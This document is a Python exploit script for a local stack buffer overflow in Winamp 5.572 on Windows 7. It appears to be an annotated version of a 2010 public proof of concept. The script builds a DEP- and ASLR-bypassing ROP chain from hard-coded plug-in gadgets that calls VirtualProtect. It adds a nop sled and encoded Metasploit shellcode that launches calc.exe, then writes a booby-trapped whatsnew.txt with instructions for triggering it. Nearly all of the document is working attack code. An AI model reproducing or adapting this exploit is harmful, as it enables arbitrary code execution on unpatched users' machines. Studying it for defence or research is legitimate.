#!/usr/bin/python
#Exploit Title: Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass)
#Date: June 26, 2010
#Author: Node
#Software Link: http://download.nullsoft.com/winamp/client/winamp5572_full_emusic-7plus_en-us.exe
#Tested on: Windows 7 Ultimate x64 ENG
#Badchars: '\x00\xff\x5c\x2f\x0a\x0d\x20'
#Instructions: Replace the generated whatsnew.txt with the original one in the Winamp folder, start Winamp, right-click the flash symbol, "Nullsoft Winamp...", Version history
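# Every gadget below is a little-endian dword; the address and the module it
# was taken from are copied from the original author's notes.  The chain
# relies on these plug-in modules loading at fixed addresses (the stated
# "ASLR bypass"), so it is specific to this Winamp build and plug-in set.
G_PUSH_ESP_POP_ESI = b"\x8a\x35\x84\x07"      # 0x0784358A : PUSH ESP # POP ESI # RETN [in_wm.dll]
G_PUSH_ESI_POP_EBP = b"\x8a\x3d\x14\x07"      # 0x07143D8A : PUSH ESI # SUB AL,5E # XOR EAX,EAX # POP EBP # RETN [zlib.dll]
G_XCHG_EAX_EBP = b"\xf7\xb8\x40\x07"          # 0x0740B8F7 : XCHG EAX,EBP # RETN [gen_ff.dll]
G_ADD_ESP_30 = b"\xd6\x5e\x65\x07"            # 0x07655ED6 : ADD ESP,30 # RETN [in_cdda.dll]
LPFL_OLD_PROTECT = b"\x60\xf6\x78\x07"        # 0x0778F660 : writable dword in in_mp3.dll (VirtualProtect lpflOldProtect)
G_XCHG_EAX_EDX = b"\x74\x6c\x96\x07"          # 0x07966C74 : XCHG EAX,EDX # RETN [ml_local.dll]
G_XOR_EAX_EAX = b"\x1a\x10\x09\x07"           # 0x0709101A : XOR EAX,EAX # RETN [libsndfile.dll]
G_ADD_EAX_41 = b"\x3a\xd8\x8d\x07"            # 0x078DD83A : ADD EAX,41 # RETN [ml_disc.dll]
G_MOV_ECX_EAX = b"\x67\x40\x5b\x07"           # 0x075B4067 : MOV ECX,EAX # MOV EAX,ECX # RETN [gen_ml.dll]
# NOTE(review): this address contains 0x0A although the header lists \x0a as
# a bad character; the author evidently got away with it, but confirm the
# whatsnew.txt reader really passes 0x0A through before reusing the chain.
G_ADD_EAX_ECX = b"\x65\x72\x0a\x07"           # 0x070A7265 : ADD EAX,ECX # RETN [libsndfile.dll]
G_INC_EAX = b"\x29\x13\x09\x07"               # 0x07091329 : INC EAX # RETN [libsndfile.dll]
G_SUB_EAX_EDX = b"\xb3\x6a\x6c\x07"           # 0x076C6AB3 : SUB EAX,EDX # RETN [in_flv.dll]
G_MOV_EAX_PTR_EAX = b"\xa7\x41\x11\x07"       # 0x071141A7 : MOV EAX,DWORD PTR DS:[EAX] # RETN [tataki.dll]
G_SUB_EAX_41 = b"\x08\x13\x8d\x07"            # 0x078D1308 : SUB EAX,41 # RETN [ml_disc.dll]
G_SUB_EAX_20 = b"\xc6\xd7\x8d\x07"            # 0x078DD7C6 : SUB EAX,20 # RETN [ml_disc.dll]
G_DEC_EAX = b"\xec\x11\x09\x07"               # 0x070911EC : DEC EAX # RETN [libsndfile.dll]
G_ADD_EAX_EDX = b"\x10\x7d\x0b\x07"           # 0x070B7D10 : ADD EAX,EDX # RETN [libsndfile.dll]
G_INC_ESI = b"\x82\x55\x40\x07"               # 0x07405582 : INC ESI # RETN [gen_ff.dll]
G_MOV_PTR_ESI_EAX = b"\x43\x5d\x6f\x07"       # 0x076F5D43 : MOV DWORD PTR DS:[ESI],EAX # RETN [in_midi.dll]
G_MOV_EAX_ESI = b"\xdd\xb7\x3e\x07"           # 0x073EB7DD : MOV EAX,ESI # RETN [gen_ff.dll]
G_ADD_EAX_104_POP_EBP = b"\x45\x35\x10\x08"   # 0x08103545 : ADD EAX,104 # POP EBP # RETN [freetype.wac]
G_XCHG_EAX_EBX = b"\x89\xb3\x34\x08"          # 0x0834B389 : XCHG EAX,EBX # RETN [jnetlib.w5s]
G_ADD_EBP_EAX = b"\x85\xe0\x09\x07"           # 0x0709E085 : ADD EBP,EAX # RETN [libsndfile.dll]
G_XCHG_EAX_ESP = b"\xc1\xbb\x3c\x07"          # 0x073CBBC1 : XCHG EAX,ESP # RETN [gen_ff.dll]

JUNK_DWORD = b"AAAA"  # consumed by the POP EBP in G_ADD_EAX_104_POP_EBP


def build_rop():
    """Return the ROP chain as bytes.

    Layout (offsets relative to the start of the chain): 540 bytes of
    padding up to the overwritten return address, a stack-pivot prologue,
    a 48-byte block of VirtualProtect placeholders that the chain fills in
    at run time, and then the gadget sequence that locates VirtualProtect
    and finally pivots ESP onto the filled-in call frame.  The chain is
    pure data; no register values are computed here.
    """
    chain = [
        b"A" * 540,                      # offset to the saved return address
        G_PUSH_ESP_POP_ESI,              # ESI = "start" (stack pointer at this point)
        b"A" * 16,
        G_PUSH_ESI_POP_EBP,              # EBP = ESI, EAX = 0
        G_XCHG_EAX_EBP,                  # EAX = start
        G_ADD_ESP_30,                    # skip the 0x30-byte placeholder block below
        b"0000",                         # VirtualProtect address placeholder
        b"DDDD",                         # return address placeholder (lands in the nop sled)
        b"1111",                         # lpAddress placeholder
        b"2222",                         # dwSize placeholder
        b"3333",                         # flNewProtect placeholder
        LPFL_OLD_PROTECT,                # lpflOldProtect: writable dword in in_mp3.dll
        b"A" * 24,
    ]

    # Read a kernel32 pointer that sits 0x4F0 bytes below "start" on the stack.
    # EAX is built up to 0x4F0 purely with ADD/INC gadgets so no bad bytes are
    # needed; where that pointer lands presumably depends on the exact stack
    # layout of this Winamp build.
    chain += [
        G_XCHG_EAX_EDX,                  # EDX = start
        G_XOR_EAX_EAX,
        G_ADD_EAX_41 * 4,                # EAX = 0x104
        G_MOV_ECX_EAX, G_ADD_EAX_ECX,    # EAX = 0x208
        G_MOV_ECX_EAX, G_ADD_EAX_ECX,    # EAX = 0x410
        G_ADD_EAX_41 * 3,                # EAX = 0x4D3
        G_INC_EAX * 29,                  # EAX = 0x4F0
        G_XCHG_EAX_EDX,                  # EAX = start, EDX = 0x4F0
        G_SUB_EAX_EDX,                   # EAX = start - 0x4F0
        G_MOV_EAX_PTR_EAX,               # EAX = kernel32 pointer, ESI = start
    ]

    # Turn the kernel32 pointer into VirtualProtect by adding 0x201B.  The
    # constant is again synthesised arithmetically (0x104 doubled five times,
    # then -0x41 -0x20 -4); it is tied to the kernel32 build the author
    # tested against and will differ on other patch levels.
    chain += [
        G_XCHG_EAX_EDX,                  # EDX = kernel32 pointer
        G_XOR_EAX_EAX,
        G_ADD_EAX_41 * 4,                # 0x104
    ]
    chain += [G_MOV_ECX_EAX, G_ADD_EAX_ECX] * 5   # 0x208, 0x410, 0x820, 0x1040, 0x2080
    chain += [
        G_SUB_EAX_41,                    # 0x203F
        G_SUB_EAX_20,                    # 0x201F
        G_DEC_EAX * 4,                   # 0x201B
        G_XCHG_EAX_EDX,                  # EAX = kernel32 pointer, EDX = 0x201B
        G_ADD_EAX_EDX,                   # EAX = VirtualProtect
    ]

    # Write VirtualProtect into the first placeholder (start+12).
    chain += [G_INC_ESI * 12, G_MOV_PTR_ESI_EAX]

    # Return address / lpAddress: start+12 + 3*0x104 (= 0x30C), which points
    # into the nop sled that follows the chain.  Written to start+16.
    chain += [
        G_MOV_EAX_ESI,                   # EAX = start+12
        G_XCHG_EAX_EDX,                  # EDX = start+12
        G_XOR_EAX_EAX,
    ]
    chain += [G_ADD_EAX_104_POP_EBP, JUNK_DWORD] * 3   # EAX = 0x30C
    chain += [
        G_ADD_EAX_EDX,                   # EAX = start+12+0x30C (shellcode)
        G_INC_ESI * 4,                   # ESI = start+16
        G_MOV_PTR_ESI_EAX,
    ]

    # lpAddress placeholder at start+20: same value as the return address.
    chain += [G_INC_ESI * 4, G_MOV_PTR_ESI_EAX]

    # dwSize placeholder at start+24: 0x30C (780 bytes).
    chain += [G_XCHG_EAX_EBX, G_XOR_EAX_EAX]          # EBX = shellcode address
    chain += [G_ADD_EAX_104_POP_EBP, JUNK_DWORD] * 3
    chain += [G_INC_ESI * 4, G_MOV_PTR_ESI_EAX]

    # flNewProtect placeholder at start+28: 0x41 - 1 = 0x40 (PAGE_EXECUTE_READWRITE).
    chain += [
        G_XOR_EAX_EAX,
        G_ADD_EAX_41,
        G_DEC_EAX,
        G_INC_ESI * 4,
        G_MOV_PTR_ESI_EAX,
        G_XCHG_EAX_EDX,                  # EAX = start+12, EDX = 0x40
    ]

    # Leave EBP pointing at the call frame so the shellcode has a sane frame
    # after VirtualProtect returns (the author's "fix EBP problem").
    chain += [
        G_XCHG_EAX_EBX,                  # EAX = shellcode address, EBX = start+12
        G_XOR_EAX_EAX,
        G_XCHG_EAX_EBP,                  # EBP = 0
        G_XCHG_EAX_EBX,                  # EAX = start+12
        G_ADD_EBP_EAX,                   # EBP = start+12
    ]

    # Pivot: ESP = start+12, so the next RETN pops VirtualProtect with the
    # frame filled in above.
    chain += [G_XCHG_EAX_ESP]
    return b"".join(chain)


version = b"Winamp 5.572"
rop = build_rop()
nops = b"\x90" * 304
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\xff\x5c\x2f\x0a\x0d\x20' -t perl
shellcode = (
    b"\xbb\xd2\xaa\xfa\x33\x31\xc9\xb1\x33\xdb\xd3\xd9\x74\x24"
    b"\xf4\x5e\x83\xc6\x04\x31\x5e\x0b\x03\x5e\xd9\x48\x0f\xcf"
    b"\x35\x05\xf0\x30\xc5\x76\x78\xd5\xf4\xa4\x1e\x9d\xa4\x78"
    b"\x54\xf3\x44\xf2\x38\xe0\xdf\x76\x95\x07\x68\x3c\xc3\x26"
    b"\x69\xf0\xcb\xe5\xa9\x92\xb7\xf7\xfd\x74\x89\x37\xf0\x75"
    b"\xce\x2a\xfa\x24\x87\x21\xa8\xd8\xac\x74\x70\xd8\x62\xf3"
    b"\xc8\xa2\x07\xc4\xbc\x18\x09\x15\x6c\x16\x41\x8d\x07\x70"
    b"\x72\xac\xc4\x62\x4e\xe7\x61\x50\x24\xf6\xa3\xa8\xc5\xc8"
    b"\x8b\x67\xf8\xe4\x06\x79\x3c\xc2\xf8\x0c\x36\x30\x85\x16"
    b"\x8d\x4a\x51\x92\x10\xec\x12\x04\xf1\x0c\xf7\xd3\x72\x02"
    b"\xbc\x90\xdd\x07\x43\x74\x56\x33\xc8\x7b\xb9\xb5\x8a\x5f"
    b"\x1d\x9d\x49\xc1\x04\x7b\x3c\xfe\x57\x23\xe1\x5a\x13\xc6"
    b"\xf6\xdd\x7e\x8d\x09\x6f\x05\xe8\x09\x6f\x06\x5b\x61\x5e"
    b"\x8d\x34\xf6\x5f\x44\x71\x08\x2a\xc5\xd0\x80\xf3\x9f\x60"
    b"\xcd\x03\x4a\xa6\xeb\x87\x7f\x57\x08\x97\xf5\x52\x55\x1f"
    b"\xe5\x2e\xc6\xca\x09\x9c\xe7\xde\x69\x43\x7b\x82\x43\xe6"
    b"\xfb\x21\x9c\xe2"
)
trash = b"B" * 600


def build_payload():
    """Return the complete whatsnew.txt contents as bytes.

    Order is version string, ROP chain, nop sled, encoded shellcode, then
    600 bytes of filler, exactly as the original PoC laid it out.
    """
    return version + rop + nops + shellcode + trash


def main():
    """Write the payload to ./whatsnew.txt.

    The file is opened in binary mode on purpose: the chain contains a
    0x0A byte (gadget 0x070A7265), and a text-mode write on Windows would
    rewrite it as 0x0D 0x0A and shift every byte after it.
    """
    print("[+] Winamp_5.572_whatsnew.txt Win7 ASLR and DEP Bypass - by Node")
    with open("whatsnew.txt", "wb") as expfile:
        expfile.write(build_payload())
    print("[+] whatsnew.txt generated.")


if __name__ == "__main__":
    main()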